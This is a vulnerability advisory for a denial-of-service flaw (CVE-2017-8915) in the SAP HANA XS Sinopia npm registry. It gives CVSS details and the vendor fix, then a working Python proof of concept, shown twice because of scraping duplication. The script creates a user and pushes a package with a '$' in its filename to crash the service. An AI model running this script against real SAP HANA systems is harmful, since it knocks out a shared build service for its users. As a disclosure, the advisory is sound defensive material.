ERPScanERPSCAN-17-008SAP HANA XS Sinopia - DoS vulnerability
0.006 Low
EPSS
Percentile
77.8%
Application: SAP HANA **Versions Affected:**SAP HANA 1 and SAP HANA 2 Vendor URL: SAP **Bug:**DoS **Reported:**13.12.2016 **Vendor response:**14.12.2016 **Date of Public Advisory:**14.02.2017 **Reference: **SAP Security Note 2407694 Authors: Mikhail Medvedev (ERPScan), Mathieu Geli (ERPScan)
VULNERABILITY INFORMATION
Class: DoS
Impact: Denial of Service
Remotely Exploitable: yes
Locally Exploitable: no
CVSS Information
CVE Name: CVE-2017-8915
CVSS Base Score v3: 8.3 / 10
CVSS Base Vector:
| AV: Attack Vector (Related exploit range) | Network (N) |
|---|---|
| AC: Attack Complexity (Required attack complexity) | Low (L) |
| PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
| UI: User Interaction (Required user participation) | None (N) |
| S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Changed © |
| C: Impact to Confidentiality | Low (L) |
| I: Impact to Integrity | Low (L) |
| A: Impact to Availability | Low (L) |
Description
An authenticated user to the SAP HANA XS sinopia npm registry service can crash the service by pushing a specific package.
Business risk
An attacker can use a Denial of service vulnerability for terminating the process of the Sinopia component. For this time, nobody can use this Sinopia service, which impacts some WebIDE capabilities like build features.
VULNERABLE PACKAGES
HDB 1.00
HDB 2.00
SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2407694.
TECHNICAL DESCRIPTION
SAP HANA npm registry sinopia is crashing when a user is pushing package with filenames containing ‘$’ or ‘%’ (other special chars were not tested).
Proof of Concept
Python
#!/usr/bin/env python # # NPM registry ‘sinopia’ crash by triggering an # assert in their filename verification routine # # [1478616333170] fatal — uncaught exception, please report this # [1478616333170] AssertionError: false == true # [1478616333170] at Storage.add_tarball (/hana/shared/HDP/xs/ea_data/hanapt/executionroot/2b304182-dc70-407a-bc14-553f5b9890ae/app/node_modules/sinopia/lib/local-storage.js:347:3) # [1478616333170] at Storage.add_tarball (/hana/shared/HDP/xs/ea_data/hanapt/executionroot/2b304182-dc70-407a-bc14-553f5b9890ae/app/node_modules/sinopia/lib/storage.js:171:21) # [1478616333170] at create_tarball (/hana/shared/HDP/xs/ea_data/hanapt/executionroot/2b304182-dc70-407a-bc14-553f5b9890ae/app/node_modules/sinopia/lib/index-api.js:339:28) # # Code from local-storage.js: # Storage.prototype.add_tarball = function(name, filename) { # assert(Utils.validate_name(filename)) <-- crash # […] # # – ERPScan import json import requests import random base_url = “http://172.16.100.21:50012” # change the port to your current sinopia port random = random.randint(0, 1000000) packagename = u’fakepackage%s’ % random package_endpoint = “/%s” % packagename createuser_endpoint = “/-/user/org.couchdb.user:dosuser” headers = {“content-type”: “application/json”, “user-agent”: “npm/1.4.21 node/v0.10.25 linux x64”} json_adduser={“name”:“dosuser”, “password”:“dosuser”, “email":"[email protected]”, “_id”:“org.couchdb.user:dosuser”, “type”:“user”} r = requests.put(base_url + createuser_endpoint, headers=headers, data=json.dumps(json_adduser)) print r.status_code, r.text json_data={“_id”:packagename, “name”:packagename, “versions”:{“1.0.%s” % random: “XXX”}, “_attachments”:{ ‘CRASH$’: { “data”:‘AA’, “length”: 2 } } } r = requests.put(base_url + package_endpoint, headers=headers, auth=(‘dosuser’, ‘dosuser’), data=json.dumps(json_data)) print r.status_code, r.text
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
|
#!/usr/bin/env python
NPM registry ‘sinopia’ crash by triggering an
assert in their filename verification routine
[1478616333170] fatal — uncaught exception, please report this
[1478616333170] AssertionError: false == true
[1478616333170] at Storage.add_tarball (/hana/shared/HDP/xs/ea_data/hanapt/executionroot/2b304182-dc70-407a-bc14-553f5b9890ae/app/node_modules/sinopia/lib/local-storage.js:347:3)
[1478616333170] at Storage.add_tarball (/hana/shared/HDP/xs/ea_data/hanapt/executionroot/2b304182-dc70-407a-bc14-553f5b9890ae/app/node_modules/sinopia/lib/storage.js:171:21)
[1478616333170] at create_tarball (/hana/shared/HDP/xs/ea_data/hanapt/executionroot/2b304182-dc70-407a-bc14-553f5b9890ae/app/node_modules/sinopia/lib/index-api.js:339:28)
Code from local-storage.js:
Storage.prototype.add_tarball = function(name, filename) {
assert(Utils.validate_name(filename)) <-- crash
[…]
– ERPScan
import json
import requests
import random
base_url = “http://172.16.100.21:50012” # change the port to your current sinopia port
random = random.randint(0, 1000000)
packagename = u’fakepackage%s’ % random
package_endpoint = “/%s” % packagename
createuser_endpoint = “/-/user/org.couchdb.user:dosuser”
headers = {“content-type”: “application/json”,
“user-agent”: “npm/1.4.21 node/v0.10.25 linux x64”}
json_adduser={“name”:“dosuser”,
“password”:“dosuser”,
“_id”:“org.couchdb.user:dosuser”,
“type”:“user”}
r = requests.put(base_url + createuser_endpoint, headers=headers, data=json.dumps(json_adduser))
print r.status_code, r.text
json_data={“_id”:packagename,
“name”:packagename,
“versions”:{“1.0.%s” % random: “XXX”},
“_attachments”:{
‘CRASH$’: {
“data”:‘AA’,
“length”: 2
}
}
}
r = requests.put(base_url + package_endpoint, headers=headers, auth=(‘dosuser’, ‘dosuser’), data=json.dumps(json_data))
print r.status_code, r.text
—|—
Related
